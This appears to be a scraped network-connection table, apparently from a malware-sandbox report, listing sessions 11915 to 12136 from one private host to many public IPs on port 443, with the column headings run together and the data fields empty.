                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11915192.168.2.23489808.37.204.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11916192.168.2.2352924223.182.204.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11917192.168.2.235025086.57.87.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11918192.168.2.2339332123.13.58.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11919192.168.2.2349928124.235.158.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11920192.168.2.2351778222.109.229.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11921192.168.2.235938843.21.210.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11922192.168.2.2334840160.124.150.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11923192.168.2.235047287.212.55.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11924192.168.2.2351242114.37.117.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11925192.168.2.2355594121.154.159.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11926192.168.2.2360820213.63.69.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11927192.168.2.23481525.70.15.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11928192.168.2.2340552112.169.223.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11929192.168.2.234886674.219.250.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11930192.168.2.2349630220.241.211.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11931192.168.2.2346816129.183.222.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11932192.168.2.233934468.10.111.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11933192.168.2.2348406147.126.34.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11934192.168.2.235107668.243.155.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11935192.168.2.233954817.183.1.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11936192.168.2.2345322184.143.63.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11937192.168.2.2347164200.179.232.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11938192.168.2.233325838.38.127.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11939192.168.2.234383088.212.26.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11940192.168.2.235833663.42.188.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11941192.168.2.233599019.161.106.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11942192.168.2.2344928149.90.27.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11943192.168.2.2356136106.188.122.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11944192.168.2.2360540110.255.245.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11945192.168.2.234838850.2.225.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11946192.168.2.234818474.203.174.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11947192.168.2.2343812121.214.214.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11948192.168.2.2360888208.168.235.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11949192.168.2.2335690221.150.3.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11950192.168.2.234136093.118.69.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11951192.168.2.2337948196.74.36.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11952192.168.2.2358318165.202.117.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11953192.168.2.233326441.123.223.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11954192.168.2.2349576207.196.219.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11955192.168.2.2353614121.251.57.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11956192.168.2.2346724131.121.43.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11957192.168.2.2337748111.236.169.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11958192.168.2.2342770143.67.82.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11959192.168.2.233406894.135.87.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11960192.168.2.2351976182.255.49.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11961192.168.2.234879476.9.238.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11962192.168.2.2358714175.131.20.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11963192.168.2.234736059.12.54.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11964192.168.2.235840873.56.145.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11965192.168.2.2342282183.160.209.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11966192.168.2.2333296198.41.173.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11967192.168.2.234639876.204.129.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11968192.168.2.23366404.28.165.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11969192.168.2.234887261.95.73.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11970192.168.2.2355154207.86.219.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11971192.168.2.2357770166.135.189.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11972192.168.2.233960668.106.204.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11973192.168.2.2353540154.145.181.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11974192.168.2.235365020.145.162.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11975192.168.2.2333634211.123.16.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11976192.168.2.2345880103.199.251.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11977192.168.2.2335896113.144.176.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11978192.168.2.2358502218.215.119.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11979192.168.2.2338096117.166.93.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11980192.168.2.2348242140.223.196.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11981192.168.2.233892279.125.20.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11982192.168.2.235942417.153.25.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11983192.168.2.234072254.130.56.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11984192.168.2.2337768119.63.248.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11985192.168.2.2337236222.103.215.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11986192.168.2.23412102.98.113.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11987192.168.2.23524322.228.71.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11988192.168.2.235041099.171.107.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11989192.168.2.235472897.220.157.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11990192.168.2.2343586173.41.197.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11991192.168.2.23470424.51.147.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11992192.168.2.2340818135.93.210.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11993192.168.2.2335936183.75.221.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11994192.168.2.23604401.38.75.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11995192.168.2.2333630212.22.190.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11996192.168.2.233859053.147.32.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11997192.168.2.2353672138.125.175.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11998192.168.2.233691451.10.212.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11999192.168.2.2336140115.152.170.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12000192.168.2.2344900133.133.180.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12001192.168.2.2335652129.35.78.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12002192.168.2.2358254195.204.13.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12003192.168.2.2346860140.74.239.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12004192.168.2.235596270.13.113.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12005192.168.2.2336428216.228.194.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12006192.168.2.2340510190.118.215.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12007192.168.2.23530529.140.182.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12008192.168.2.2348054124.183.38.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12009192.168.2.2347206209.131.81.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12010192.168.2.234419062.130.167.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12011192.168.2.235109493.23.35.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12012192.168.2.2335176111.190.226.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12013192.168.2.235535646.121.171.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12014192.168.2.233637483.86.65.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12015192.168.2.2333402157.159.223.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12016192.168.2.233362870.157.92.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12017192.168.2.234001436.97.13.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12018192.168.2.236031035.64.15.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12019192.168.2.234557072.118.97.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12020192.168.2.234457824.81.95.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12021192.168.2.2344068140.241.198.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12022192.168.2.2359422178.87.94.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12023192.168.2.2344102196.194.60.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12024192.168.2.235074472.233.183.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12025192.168.2.234658053.5.127.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12026192.168.2.234457873.168.175.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12027192.168.2.2346996165.129.133.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12028192.168.2.233966447.151.191.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12029192.168.2.2355312153.142.225.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12030192.168.2.235191663.33.40.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12031192.168.2.234940695.236.44.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12032192.168.2.2359742169.228.4.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12033192.168.2.233694687.121.232.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12034192.168.2.233799270.98.76.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12035192.168.2.2342918157.155.1.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12036192.168.2.2342670218.68.106.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12037192.168.2.2335968121.211.234.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12038192.168.2.234605088.161.1.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12039192.168.2.2356928189.198.102.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12040192.168.2.235672068.235.95.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12041192.168.2.2345586101.169.252.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12042192.168.2.2348956218.45.181.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12043192.168.2.234657674.73.120.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12044192.168.2.235859014.220.213.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12045192.168.2.2337160175.80.241.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12046192.168.2.23467948.100.74.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12047192.168.2.2341684113.84.246.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12048192.168.2.2342074204.169.176.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12049192.168.2.2338174209.133.152.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12050192.168.2.233762883.101.190.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12051192.168.2.2357106179.84.167.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12052192.168.2.2350538133.142.99.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12053192.168.2.234656679.150.228.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12054192.168.2.233648878.108.216.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12055192.168.2.234619667.61.182.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12056192.168.2.2353240178.56.158.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12057192.168.2.235428087.23.137.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12058192.168.2.233578270.202.148.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12059192.168.2.235638852.134.196.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12060192.168.2.2354978114.134.87.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12061192.168.2.235342245.250.44.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12062192.168.2.2337276108.101.239.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12063192.168.2.2339124181.17.48.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12064192.168.2.2345298162.132.25.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12065192.168.2.2351252115.31.54.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12066192.168.2.233688296.157.137.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12067192.168.2.2357292130.63.114.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12068192.168.2.23362502.30.27.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12069192.168.2.2333480153.110.84.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12070192.168.2.233304299.49.26.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12071192.168.2.234181297.222.51.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12072192.168.2.235287463.120.254.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12073192.168.2.2334182153.255.8.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12074192.168.2.2358660173.166.219.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12075192.168.2.235328266.114.209.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12076192.168.2.233991413.123.62.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12077192.168.2.2358870194.25.4.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12078192.168.2.2343826201.68.74.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12079192.168.2.2359496108.228.99.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12080192.168.2.2338622187.156.102.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12081192.168.2.2346930108.187.6.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12082192.168.2.233561674.14.166.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12083192.168.2.2333536120.252.229.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12084192.168.2.233536239.174.135.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12085192.168.2.2342306186.145.98.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12086192.168.2.2359624221.166.240.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12087192.168.2.234565493.155.29.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12088192.168.2.2342292171.200.137.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12089192.168.2.2349838158.184.14.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12090192.168.2.2353772126.55.48.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12091192.168.2.2339574216.25.59.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12092192.168.2.2355808120.161.170.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12093192.168.2.2356604190.39.24.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12094192.168.2.2347888146.247.237.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12095192.168.2.234241045.195.106.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12096192.168.2.2356824202.180.97.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12097192.168.2.2348366212.72.176.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12098192.168.2.2343730140.61.16.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12099192.168.2.2353730205.22.7.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12100192.168.2.233628650.71.166.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12101192.168.2.2350190134.145.96.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12102192.168.2.2353750101.227.172.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12103192.168.2.235883493.98.26.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12104192.168.2.2357094161.91.238.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12105192.168.2.2334662197.225.32.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12106192.168.2.235840834.16.243.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12107192.168.2.2351566111.44.177.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12108192.168.2.2337450219.0.110.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12109192.168.2.2351040209.127.166.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12110192.168.2.233477694.51.159.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12111192.168.2.2338822130.214.204.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12112192.168.2.234024488.220.12.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12113192.168.2.2352372200.29.210.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12114192.168.2.234649061.195.165.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12115192.168.2.2339098192.165.204.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12116192.168.2.2351462121.1.225.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12117192.168.2.234463852.55.116.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12118192.168.2.2349722152.135.203.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12119192.168.2.234401667.152.191.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12120192.168.2.2340640197.41.204.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12121192.168.2.2347692176.44.218.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12122192.168.2.234682475.195.59.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12123192.168.2.233698247.189.109.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12124192.168.2.233899094.79.209.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12125192.168.2.2334746124.252.12.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12126192.168.2.23463209.158.134.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12127192.168.2.2340768131.165.116.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12128192.168.2.235186865.209.207.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12129192.168.2.23349288.80.124.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12130192.168.2.2340758161.131.126.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12131192.168.2.234910836.35.151.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12132192.168.2.2360242101.13.232.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12133192.168.2.234469295.14.197.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12134192.168.2.2336186152.29.165.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12135192.168.2.235464459.20.14.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            12136192.168.2.2346980219.104.111.176443
                                            TimestampBytes transferredDirectionData


